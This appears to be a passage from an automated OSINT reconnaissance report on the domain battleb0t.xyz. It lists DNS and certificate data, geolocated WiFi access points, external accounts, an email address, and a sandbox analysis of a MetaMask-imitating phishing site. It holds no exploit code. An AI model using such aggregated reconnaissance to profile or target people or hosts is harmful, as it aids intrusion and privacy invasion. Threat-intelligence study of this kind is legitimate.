[{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:08:36 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.110.154 | 185.199.110.153 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 2 | 0 | 1 | 0 | None | vscode.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:45:09) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 01a637 (Net ID: 00:02:2D:01:A6:37) | 37.7642, -122.3993 |
| 2023-05-12 03:01:04 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.112): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Livejournal (Category: blog)
https://login.livejournal.com | login |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | banksean@gmail.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamasko.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b7c_IE_EarlyTabStart_0xea4_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2940"\n "IsoScope_b7c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b7c_ConnHashTable<2940>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_b7c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.186:80"\n "154.82.100.186:443"\n "172.217.12.106:443"\n "47.253.50.2:443"\n "142.250.191.42:443"\n "142.251.214.131:443"\n "43.251.41.15:443"\n "104.17.210.243:443"\n "142.250.191.67:443"\n "103.143.19.103:443"\n "104.17.213.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "185.199.109.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamasko.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "collect-v6.51.la"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "metamask.io"\n "metamasko.com"\n "perf.hsforms.com"\n "sdk.51.la"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="summary_large_image" name="twitter:card">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<div style="padding-top:56.17021276595745%" class="video w-video w-embed"><iframe class="embedly-embed" src="widgets/media.html" scrolling="no" title="YouTube embed" frameborder="0" allow="autoplay; fullscreen" allowfullscreen="true"></iframe></div>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<a href="javascript:;" rel="noreferer\n noopener" target="_blank" class="footer-link">Twitter</a>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlref_httpmetamasko.com" as clean (type is "HTML document UTF-8 Unicode text with very long lines")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF342.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF3C1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 450x450 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003916]\n "CabF331.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:66:BC) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tenor (Category: images)
https://tenor.com/users/login | login |
| 2023-05-12 02:44:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 74.170.74.34.bc.googleusercontent.com | 34.74.170.74 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:11 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"operating_system": {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, "last_updated_at": "2023-05-12T02:24:16.353Z", "ip": "87.248.157.102", "labels": ["email", "remote-access", "database", "file-sharing"], "location_updated_at": "2023-05-03T17:32:15.874229Z", "autonomous_system_updated_at": "2023-05-03T17:32:15.874604Z", "location": {"province": "Bursa Province", "city": "Bursa", "country": "Turkey", "coordinates": {"latitude": 40.19559, "longitude": 29.06013}, "postal_code": "16250", "country_code": "TR", "timezone": "Europe/Istanbul", "continent": "Asia"}, "dns": {"records": {"cpanel.ozansezgin.com.tr": {"record_type": "A", "resolved_at": "2023-01-05T17:17:36.160101130Z"}, "www.discord.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-04T14:04:52.760179166Z"}, "webdisk.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-02T14:33:42.879167Z"}, "www.berateren.com.tr": {"record_type": "CNAME", "resolved_at": "2023-01-08T16:41:42.225534467Z"}, "cpanel.craftregion.net": {"record_type": "A", "resolved_at": "2022-12-28T16:14:35.726676809Z"}, "file.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-28T17:39:26.229223807Z"}, "emperialnetwork.com.tr": {"record_type": "A", "resolved_at": "2022-12-19T16:59:46.464337451Z"}, "www.dostbultanis.xyz": {"record_type": "CNAME", "resolved_at": "2022-11-05T18:06:42.153390405Z"}, "www.muratcanozturkk.xyz": {"record_type": "CNAME", "resolved_at": "2022-10-04T17:07:38.536349504Z"}, "cpcalendars.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-14T15:00:12.399066755Z"}, "zehirmedya.com": {"record_type": "A", "resolved_at": "2023-02-27T15:20:55.500762915Z"}, "cpcalendars.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-25T13:44:53.784463939Z"}, "www.serpilbolatcan.com": {"record_type": "CNAME", "resolved_at": "2022-11-03T13:53:32.177886238Z"}, "webmail.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-03T21:41:44.056705877Z"}, "mestbungalov.xyz": {"record_type": "A", "resolved_at": "2022-11-02T09:30:48.965680163Z"}, "www.tahakaya.tk": {"record_type": "CNAME", "resolved_at": "2022-10-24T16:44:34.447999702Z"}, "www.preview.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-22T16:54:29.866591925Z"}, "www.undsel.org": {"record_type": "CNAME", "resolved_at": "2023-02-08T19:45:18.794414750Z"}, "www.mcevim.com": {"record_type": "CNAME", "resolved_at": "2023-01-25T13:44:54.141586649Z"}, "mail.tahakaya.tk": {"record_type": "CNAME", "resolved_at": "2022-10-30T17:45:49.047255176Z"}, "www.klausfx.com": {"record_type": "CNAME", "resolved_at": "2022-10-05T13:42:56.873133625Z"}, "cpanel.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-10T14:06:47.408478527Z"}, "xfcheats.tk": {"record_type": "A", "resolved_at": "2022-10-03T17:50:42.316963800Z"}, "www.fastcup.gq": {"record_type": "CNAME", "resolved_at": "2022-10-13T15:20:37.540317287Z"}, "benimbungalovum.com": {"record_type": "A", "resolved_at": "2022-11-02T14:17:47.483900217Z"}, "_dc-mx.e5e37e515239.sc-riber.games": {"record_type": "A", "resolved_at": "2023-05-07T17:27:28.131252899Z"}, "ochook.gq": {"record_type": "A", "resolved_at": "2023-03-08T16:13:39.337482400Z"}, "cpcontacts.xfcheats.tk": {"record_type": "A", "resolved_at": "2022-10-19T17:13:40.119876482Z"}, "webdisk.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-30T17:45:49.630983754Z"}, "www.sourcecode.xeticias.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:08:41.037846092Z"}, "webdisk.burakatli.tk": {"record_type": "A", "resolved_at": "2022-12-06T18:01:14.023227309Z"}, "mail.dostbultanis.xyz": {"record_type": "CNAME", "resolved_at": "2022-11-10T16:55:45.621219874Z"}, "webmail.skymine.pw": {"record_type": "A", "resolved_at": "2022-11-16T16:52:03.463771179Z"}, "discord.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-11T14:18:39.106831985Z"}, "cpanel.pimapencanakkale.com": {"record_type": "A", "resolved_at": "2023-04-23T15:46:39.115203086Z"}, "webdisk.pimapencanakkale.com": {"record_type": "A", "resolved_at": "2023-05-02T22:30:28.895880752Z"}, "furkanulgen.dev": {"record_type": "A", "resolved_at": "2023-02-05T14:53:26.346732767Z"}, "cpcontacts.altf13.com": {"record_type": "A", "resolved_at": "2023-01-31T12:46:00.853214402Z"}, "bayholmen.tk": {"record_type": "A", "resolved_at": "2022-10-03T17:49:42.087742760Z"}, "cpcontacts.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-20T14:59:42.612109055Z"}, "ikisekizbungalov.com": {"record_type": "A", "resolved_at": "2022-11-03T11:07:18.159230616Z"}, "mail.fealhost.com": {"record_type": "CNAME", "resolved_at": "2023-04-06T04:11:51.805186315Z"}, "whm.discord.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-04T14:04:52.276649345Z"}, "darkwolf.network": {"record_type": "A", "resolved_at": "2023-03-21T03:44:01.438444589Z"}, "www.karacolticaret.pw": {"record_type": "CNAME", "resolved_at": "2023-01-27T17:21:17.709086375Z"}, "mail.bwkcn.codes": {"record_type": "CNAME", "resolved_at": "2022-10-23T12:43:26.611424497Z"}, "yaraticikupler.fun": {"record_type": "A", "resolved_at": "2023-01-14T22:49:21.772913425Z"}, "cpcalendars.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-14T17:19:23.144240561Z"}, "webdisk.metamimarlik.com": {"record_type": "A", "resolved_at": "2022-11-03T13:29:46.589630465Z"}, "panel.sourcepawn.com": {"record_type": "A", "resolved_at": "2022-12-09T14:04:16.033214357Z"}, "www.ryzemc.com.serpilbolatcan.com": {"record_type": "A", "resolved_at": "2022-11-15T13:52:29.199227401Z"}, "webdisk.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-05T15:07:37.703008867Z"}, "altf13.com": {"record_type": "A", "resolved_at": "2023-02-02T12:39:42.545911226Z"}, "mail.xfcheats.tk": {"record_type": "CNAME", "resolved_at": "2022-10-04T16:56:53.515031714Z"}, "www.shop.itanpia.org": {"record_type": "A", "resolved_at": "2022-12-21T17:17:06.217809961Z"}, "cpcontacts.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-04-29T14:19:50.400682526Z"}, "meneksebungalov.com": {"record_type": "A", "resolved_at": "2022-11-08T13:42:29.160787558Z"}, "dc.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-20T16:55:19.902730683Z"}, "tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-12T17:18:46.107319847Z"}, "tiktok.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-05T14:19:22.052159604Z"}, "www.test.bilgietkisi.com": {"record_type": "A", "resolved_at": "2023-03-18T13:54:35.365876978Z"}, "shop.itanpia.org": {"record_type": "A", "resolved_at": "2023-01-14T08:39:09.594223328Z"}, "webdisk.kemsuca.com": {"record_type": "A", "resolved_at": "2022-10-04T13:31:14.803922215Z"}, "cpcalendars.muratcanozturkk.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:07:36.743450291Z"}, "www.enesk.xyz": {"record_type": "CNAME", "resolved_at": "2023-01-27T17:57:21.368850900Z"}, "www.twitch.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-05T14:19:22.374732364Z"}, "www.gameguard.ochook.tk": {"record_type": "A", "resolved_at": "2023-03-11T19:38:51.584036132Z"}, "berateren.com.tr": {"record_type": "A", "resolved_at": "2023-01-14T17:18:47.330887795Z"}, "webdisk.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-19T13:23:09.181757813Z"}, "ormanevleribungalov.com": {"record_type": "A", "resolved_at": "2022-12-08T13:46:22.391341104Z"}, "skyboxtr.com": {"record_type": "A", "resolved_at": "2023-02-28T14:56:51.452831255Z"}, "www.mental.xeticias.xyz": {"record_type": "A", "resolved_at": "2022-11-28T17:27:53.459024802Z"}, "www.mestbungalov.com": {"record_type": "CNAME", "resolved_at": "2022-10-31T13:52:56.890144647Z"}, "www.dev.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-29T16:58:51.266944718Z"}, "cpcalendars.serpilbolatcan.com": {"record_type": "A", "resolved_at": "2022-10-25T14:05:20.558939618Z"}, "www.exeteam.net": {"record_type": "CNAME", "resolved_at": "2023-04-27T20:57:35.047087859Z"}, "altinbungalov.com": {"record_type": "A", "resolved_at": "2022-10-14T12:46:13.873525996Z"}, "mail.canakkaleuyduantenci.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T14:05:51.043804823Z"}, "explation.xyz": {"record_type": "A", "resolved_at": "2022-11-03T20:22:32.508653902Z"}, "muratcanozturkk.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:07:35.839337873Z"}, "cpanel.itanpia.org": {"record_type": "A", "resolved_at": "2022-12-19T16:39:16.921255240Z"}, "eventkil.com": {"record_type": "A", "resolved_at": "2023-05-04T14:44:33.809431992Z"}, "www.metamimarlik.com": {"record_type": "CNAME", "resolved_at": "2022-11-22T13:53:03.897632462Z"}, "sapancabungalovotel.com": {"record_type": "A", "resolved_at": "2022-10-21T13:45:32.989372866Z"}, "xn--kemaldnmez-jcb.com": {"record_type": "A", "resolved_at": "2023-02-12T14:33:55.830955863Z"}, "sourcepawn.com": {"record_type": "A", "resolved_at": "2022-11-27T13:51:33.375397529Z"}, "cpanel.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-25T17:24:32.346509475Z"}, "cpcalendars.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-01T14:00:27.620190431Z"}, "cpcontacts.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-11-03T16:33:54.752105702Z"}, "cpanel.metamimarlik.com": {"record_type": "A", "resolved_at": "2022-11-11T13:28:40.298899238Z"}, "webdisk.altf13.com": {"record_type": "A", "resolved_at": "2023-01-30T12:43:04.754213362Z"}, "cpanel.rallirp.com": {"record_type": "A", "resolved_at": "2023-02-24T14:29:25.642654288Z"}, "cpcalendars.skymine.pw": {"record_type": "A", "resolved_at": "2022-11-03T16:23:02.786010839Z"}, "exeteam.net": {"record_type": "A", "resolved_at": "2023-05-07T19:37:55.421427404Z"}, "whm.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-11-03T16:33:56.304949095Z"}, "www.iletisim.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-03T14:20:38.744192612Z"}, "webmail.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-19T13:23:09.500084525Z"}, "canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-08T14:25:32.527389858Z"}, "kemsuca.com": {"record_type": "A", "resolved_at": "2022-10-05T13:42:30.471263227Z"}, "cpcontacts.pimapencanakkale.com": {"record_type": "A", " | 87.248.157.102 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WaveLAN Network (Net ID: 00:02:2D:67:07:75) | 34.0544, -118.244 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_1.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3030::ac43:a8fc | battleb0t.xyz |
| 2023-05-12 03:36:57 | Malicious IP Address | Yes | MetaDefender | 0 | 0 | 2 | 0 | None | webroot.com [87.248.157.102] | 87.248.157.102 |
